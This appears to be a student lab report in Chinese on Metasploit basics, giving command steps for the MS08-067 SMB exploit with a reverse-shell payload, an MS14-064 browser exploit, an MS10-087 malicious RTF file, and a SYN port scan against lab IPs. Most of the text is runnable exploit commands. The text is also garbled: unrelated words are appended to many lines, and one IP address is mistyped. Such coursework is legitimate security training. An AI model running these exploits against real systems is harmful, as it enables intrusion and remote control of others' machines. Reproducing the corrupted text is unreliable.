本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:shell
1.輸入msfconsolewindows
2.輸入search ms08_067進行搜索漏洞api
3.複製所在位置並使用,use exploit/windows/smb/ms08_067_netapi瀏覽器
4.輸入show options查看當前配置安全
5.進行配置依次輸入tcp
set payload generic/shell_reverse_tcp編碼
set rhost 192.168.215.129(靶機的IP)線程
6.輸入exploit進行監聽,成功,輸入dir進行查看3d
1.輸入msfconsolecode
2.show options查看相關參數
3.設定rhost 192.168.215.129(靶機)
初始步驟同上
1.設置payload
2.根據options裏的信息設置本機ip 92.168.215.128
3.設置uripath ms14064
4.設置lhost爲攻擊機ip 192.168.215.128
1.輸入search ms10_087並輸入use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
2.輸入set payload windows/exec(運行一個可執行文件)
3.輸入set CMD calc.exe(綁定計算器程序,進行啓動)
4.輸入exploit,進行攻擊
5.使用show options命令查看一些參數值,好比文件名、綁定程序等等。此時文件名爲默認,也能夠進行修改
1.輸入use auxiliary/scanner/portscan/syn(使用portscan模塊)
2.輸入show options
3.輸入set RHOST 192.168.183.129(目標)
4.輸入set THREADS 50(線程)
5.輸入exploit
(1)用本身的話解釋什麼是exploit,payload,encode。
(2)離實戰還缺些什麼技術或步驟?